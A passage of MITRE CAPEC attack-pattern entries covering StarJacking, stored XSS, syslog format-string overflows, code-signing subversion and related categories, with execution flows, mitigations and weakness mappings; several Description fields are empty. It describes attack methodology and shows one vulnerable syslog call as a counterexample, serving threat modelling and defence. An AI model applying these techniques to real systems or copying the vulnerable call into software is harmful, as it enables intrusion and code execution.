ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	125	Flooding

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

This type of an attack requires the ability to generate a large amount of SSL traffic to send a target server.

Mitigations

To mitigate this type of an attack, an organization can create rule based filters to silently drop connections if too many are attempted in a certain time period.

Related Weaknesses

CWE-ID	Weakness Name
770	Allocation of Resources Without Limits or Throttling

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1499.002	Endpoint Denial of Service:Service Exhaustion Flood

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-693: StarJacking

Attack Pattern ID: 693

Abstraction: Detailed

View customized information:

Description

An adversary spoofs software popularity metadata to deceive users into believing that a maliciously provided package is widely used and originates from a trusted source.

Extended Description

Many open-source software packages are hosted via third-party package managers (e.g., Node Package Manager, PyPi, Yarn, etc.) that allow for easy integration of software components into existing development environments. A package manager will typically include various metadata about the software and often include a link to the package's source code repository, to assist developers in determining the trustworthiness of the software. One common statistic used in this decision-making process is the popularity of the package. This entails checking the amount of "Stars" the package has received, which the package manager displays based on the provided source code repository URL. However, many package managers do not validate the connection between the package and source code repository being provided. Adversaries can thus spoof the popularity statistic of a malicious package by associating a popular source code repository URL with the package. This can ultimately trick developers into unintentionally incorporating the malicious package into their development environment.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	691	Spoof Open-Source Software Metadata

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Supply Chain, Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions
Supply Chain Risks	Development and Production, Sustainment

Execution Flow

Explore

Identify target: The adversary must first identify a target package whose popularity statistics will be leveraged. This will be a popular and widely used package, as to increase the perceived pedigree of the malicious package.

Experiment

Spoof package popularity: The adversary provides their malicious package to a package manager and uses the source code repository URL identified in Step 1 to spoof the popularity of the package. This malicious package may also closely resemble the legitimate package whose statistics are being utilized.

Exploit

Exploit victims: The adversary infiltrates development environments with the goal of conducting additional attacks.

Techniques
Active: The adversary attempts to trick victims into downloading the malicious package by means such as phishing and social engineering.
Passive: The adversary waits for victims to download and leverage the malicious package.

Prerequisites

Identification of a popular open-source package whose popularity metadata is to be used for the malicious package.

Skills Required

[Level: Low]

Ability to provide a package to a package manager and associate a popular package's source code repository URL.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Accountability	Hide Activities
Access Control Authorization	Execute Unauthorized Commands Alter Execution Logic Gain Privileges

Mitigations

Before downloading open-source packages, perform precursory metadata checks to determine the author(s), frequency of updates, when the software was last updated, and if the software is widely leveraged.

Look for conflicting or non-unique repository references to determine if multiple packages share the same repository reference.

Reference vulnerability databases to determine if the software contains known vulnerabilities.

Only download open-source packages from reputable package managers.

After downloading open-source packages, ensure integrity values have not changed.

Before executing or incorporating the package, leverage automated testing techniques (e.g., static and dynamic analysis) to determine if the software behaves maliciously.

Example Instances

In April 2022, Checkmarx reported that packages hosted on NPM, PyPi, and Yarn do not properly validate that the provided GitHub repository URL actually pertains to the package being provided. Combined with additional attacks such as TypoSquatting, this allows adversaries to spoof popularity metadata by associating popular GitHub repository URLs with the malicious package. This can further lead to developers unintentionally including the malicious package within their development environments [REF-721].

Related Weaknesses

CWE-ID	Weakness Name
494	Download of Code Without Integrity Check

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-721] Tzachi Zornstein. "StarJacking – Making Your New Open Source Package Popular in a Snap". Checkmarx. 2022-04-19. <https://checkmarx.com/blog/starjacking-making-your-new-open-source-package-popular-in-a-snap/>. URL validated: 2022-08-12.

Content History

Submissions
Submission Date	Submitter	Organization
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)

CAPEC-592: Stored XSS

Attack Pattern ID: 592

Abstraction: Detailed

View customized information:

Description

An adversary utilizes a form of Cross-site Scripting (XSS) where a malicious script is persistently "stored" within the data storage of a vulnerable web application as valid input.

Extended Description

Initially presented by an adversary to the vulnerable web application, the malicious script is incorrectly considered valid input and is not properly encoded by the web application. A victim is then convinced to use the web application in a way that creates a response that includes the malicious script. This response is subsequently sent to the victim and the malicious script is executed by the victim's browser. To launch a successful Stored XSS attack, an adversary looks for places where stored input data is used in the generation of a response. This often involves elements that are not expected to host scripts such as image tags (<img>), or the addition of event attributes such as onload and onmouseover. These elements are often not subject to the same input validation, output encoding, and other content filtering and checking routines.

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	63	Cross-Site Scripting (XSS)
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	18	XSS Targeting Non-Script Elements
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	32	XSS Through HTTP Query Strings
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	86	XSS Through HTTP Headers
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	198	XSS Targeting Error Pages
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	199	XSS Using Alternate Syntax
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	209	XSS Using MIME Type Mismatch
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	243	XSS Targeting HTML Attributes
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	244	XSS Targeting URI Placeholders
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	245	XSS Using Doubled Characters
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	247	XSS Using Invalid Characters
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	73	User-Controlled Filename
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	93	Log Injection-Tampering-Forging

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Survey the application for stored user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application. The adversary is looking for areas where user input is stored, such as user profiles, shopping carts, file managers, forums, blogs, and logs.

Techniques
Use a spidering tool to follow and record all links and analyze the web pages to find entry points.
Use a proxy tool to record all links visited during a manual traversal of the web application.
Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

Probe identified potential entry points for stored XSS vulnerability: The adversary uses the entry points gathered in the "Explore" phase as a target list and injects various common script payloads and special characters to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.

Techniques
Use a list of XSS probe strings to submit script in input fields that could be stored by the web application. If possible, the probe strings contain a unique identifier so they can be queried for after submitting to see if they are stored.
Use a list of HTML special characters to submit in input fields that could be stored by the web application and check if they were properly encoded, replaced, or filtered out.

Store malicious XSS content: Once the adversary has determined which stored locations are vulnerable to XSS, they will interact with the web application to store the malicious content. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from a victim.

Techniques
Store a malicious script on a page that will execute when viewed by the victim.
Use a tool such as BeEF to store a hook into the web application. This will alert the adversary when the victim has accessed the content and will give the adversary control over the victim's browser, allowing them access to cookies, user screenshot, user clipboard, and more complex XSS attacks.

Exploit

Get victim to view stored content: In order for the attack to be successful, the victim needs to view the stored malicious content on the webpage.

Techniques
Send a phishing email to the victim containing a URL that will direct them to the malicious stored content.
Simply wait for a victim to view the content. This is viable in situations where content is posted to a popular public forum.

Prerequisites

An application that leverages a client-side web browser with scripting enabled.

An application that fails to adequately sanitize or encode untrusted input.

An application that stores information provided by the user in data storage of some kind.

Skills Required

[Level: Medium]

Requires the ability to write scripts of varying complexity and to inject them through user controlled fields within the application.

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Authorization Access Control	Gain Privileges
Confidentiality Integrity Availability	Execute Unauthorized Commands
Integrity	Modify Data

Mitigations

Use browser technologies that do not allow client-side scripting.

Utilize strict type, character, and encoding enforcement.

Ensure that all user-supplied input is validated before being stored.

Example Instances

An adversary determines that a system uses a web based interface for administration. The adversary creates a new user record and supplies a malicious script in the user name field. The user name field is not validated by the system and a new log entry is created detailing the creation of the new user. Later, an administrator reviews the log in the administrative console. When the administrator comes across the new user entry, the browser sees a script and executes it, stealing the administrator's authentication cookie and forwarding it to the adversary. An adversary then uses the received authentication cookie to log in to the system as an administrator, provided that the administrator console can be accessed remotely.

An online discussion forum allows its members to post HTML-enabled messages, which can also include image tags. An adversary embeds JavaScript in the image tags of their message. The adversary then sends the victim an email advertising free goods and provides a link to the form for how to collect. When the victim visits the forum and reads the message, the malicious script is executed within the victim's browser.

Related Weaknesses

CWE-ID	Weakness Name
79	Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

References

[REF-605] "OWASP Web Security Testing Guide". Testing for Stored Cross Site Scripting. The Open Web Application Security Project (OWASP). <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2017-04-15 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-04-15 (Version 2.9)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Description
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Example_Instances
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Execution_Flow
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Description, Extended_Description

CAPEC-67: String Format Overflow in syslog()

Attack Pattern ID: 67

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	100	Overflow Buffers
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	135	Format String Injection
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	69	Target Programs with Elevated Privileges

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures, Inject Unexpected Items

Execution Flow

Explore

Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. In this attack, adversaries look for applications that use syslog() incorrectly.

Experiment

Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer. For each user-controllable input that the adversary suspects is vulnerable to format string injection, attempt to inject formatting characters such as %n, %s, etc.. The goal is to manipulate the string creation using these formatting characters.
Techniques
Inject probe payload which contains formatting characters (%s, %d, %n, etc.) through input parameters.

Craft overflow content: The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary will craft a set of content that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversaries' choosing which points to code injected by the adversary.

Techniques
The formatting characters %s and %d are useful for observing memory and trying to print memory addresses. If an adversary has access to the log being written to they can observer this output and use it to help craft their attack.
The formatting character %n is useful for adding extra data onto the buffer.

Exploit

Overflow the buffer: Using the injection vector, the adversary supplies the program with the crafted format string injection, causing a buffer.

Prerequisites

The Syslog function is used without specifying a format string argument, allowing user input to be placed direct into the function call as a format string.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Execute Unauthorized Commands
Availability	Unreliable Execution
Confidentiality Access Control Authorization	Gain Privileges
Integrity	Modify Data

Mitigations

The code should be reviewed for misuse of the Syslog function call. Manual or automated code review can be used. The reviewer needs to ensure that all format string functions are passed a static string which cannot be controlled by the user and that the proper number of arguments are always sent to that function as well. If at all possible, do not use the %n operator in format strings. The following code shows a correct usage of Syslog():

syslog(LOG_ERR, "%s", cmdBuf);

The following code shows a vulnerable usage of Syslog():

syslog(LOG_ERR, cmdBuf);

// the buffer cmdBuff is taking user supplied data.

Example Instances

Format string vulnerability in TraceEvent function for ntop before 2.1 allows remote adversaries to execute arbitrary code by causing format strings to be injected into calls to the syslog function, via (1) an HTTP GET request, (2) a user name in HTTP authentication, or (3) a password in HTTP authentication. See also: CVE-2002-0412

Related Weaknesses

CWE-ID	Weakness Name
120	Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
134	Use of Externally-Controlled Format String
74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
20	Improper Input Validation
680	Integer Overflow to Buffer Overflow
697	Incorrect Comparison

Taxonomy Mappings

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
06	Format String

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

[REF-503] scut and team teso. "Exploiting Format String Vulnerabilities". <http://doc.bughunter.net/format-string/exploit-fs.html>.

[REF-504] Halvar Flake. "Auditing binaries for security vulnerabilities". <http://www.blackhat.com/presentations/bh-europe-00/HalvarFlake/HalvarFlake.ppt>.

[REF-505] "Fortify Taxonomy of Vulnerabilities". Fortify Software. <https://vulncat.hpefod.com/en>.

[REF-506] "Syslog man page". <http://www.rt.com/man/syslog.3.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Description, Execution_Flow, Prerequisites, Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Example_Instances
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Mitigations

CAPEC CATEGORY: Subvert Access Control

Category ID: 225

Summary

Membership

Nature	Type	ID	Name
MemberOf	View - A view in CAPEC represents a perspective with which one might look at the collection of attack patterns defined within CAPEC. There are three different types of views: graphs, explicit slices, and implicit slices.	1000	Mechanisms of Attack
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	21	Exploitation of Trusted Identifiers
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	22	Exploiting Trust in Client
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	94	Adversary in the Middle (AiTM)
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	114	Authentication Abuse
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	115	Authentication Bypass
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	122	Privilege Abuse
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	233	Privilege Escalation
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	390	Bypassing Physical Security
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	507	Physical Theft
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	560	Use of Known Domain Credentials

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Relationships
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Description, Relationships
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Relationships
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Relationships
Previous Entry Names
Change Date	Previous Entry Name
2017-01-09 (Version 2.9)	Exploitation of Authentication

CAPEC-68: Subvert Code-signing Facilities

Attack Pattern ID: 68

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	233	Privilege Escalation
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	661	Root/Jailbreak Detection Evasion via Debugging

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Subvert Access Control

Prerequisites

A framework-based language that supports code signing (such as, and most commonly, Java or .NET)

Deployed code that has been signed by its authoring vendor, or a partner.

The attacker will, for most circumstances, also need to be able to place code in the victim container. This does not necessarily mean that they will have to subvert host-level security, except when explicitly indicated.

Skills Required

[Level: High]

Subverting code signing is not a trivial activity. Most code signing and verification schemes are based on use of cryptography and the attacker needs to have an understanding of these cryptographic operations in good detail. Additionally the attacker also needs to be aware of the way memory is assigned and accessed by the container since, often, the only way to subvert code signing would be to patch the code in memory. Finally, a knowledge of the platform specific mechanisms of signing and verifying code is a must.

Resources Required

The Attacker needs no special resources beyond the listed prerequisites in order to conduct this style of attack.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

A given code signing scheme may be fallible due to improper use of cryptography. Developers must never roll out their own cryptography, nor should existing primitives be modified or ignored.

If an attacker cannot attack the scheme directly, they might try to alter the environment that affects the signing and verification processes. A possible mitigation is to avoid reliance on flags or environment variables that are user-controllable.

Example Instances

In old versions (prior to 3.0b4) of the Netscape web browser Attackers able to foist a malicious Applet into a client's browser could execute the "Magic Coat" attack. In this attack, the offending Applet would implement its own getSigners() method. This implementation would use the containing VM's APIs to acquire other Applet's signatures (by calling _their_ getSigners() method) and if any running Applet had privileged-enough signature, the malicious Applet would have inherited that privilege just be (metaphorically) donning the others' coats.

Some (older) web browsers allowed scripting languages, such as JavaScript, to call signed Java code. In these circumstances, the browser's VM implementation would choose not to conduct stack inspection across language boundaries (from called signed Java to calling JavaScript) and would short-circuit "true" at the language boundary. Doing so meant that the VM would allow any (unprivileged) script to call privileged functions within signed code with impunity, causing them to fall prey to luring attacks.

The ability to load unsigned code into the kernel of earlier versions of Vista and bypass integrity checking is an example of such subversion. In the proof-of-concept, it is possible to bypass the signature-checking mechanism Vista uses to load device drivers.

Related Weaknesses

CWE-ID	Weakness Name
325	Missing Cryptographic Step
328	Use of Weak Hash
1326	Missing Immutable Root of Trust in Hardware

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1553.002	Subvert Trust Controls: Code Signing

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attacker_Skills_or_Knowledge_Required, Description Summary
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Weaknesses
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-13: Subverting Environment Variable Values

Attack Pattern ID: 13

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	77	Manipulating User-Controlled Variables
PeerOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	10	Buffer Overflow via Environment Variables
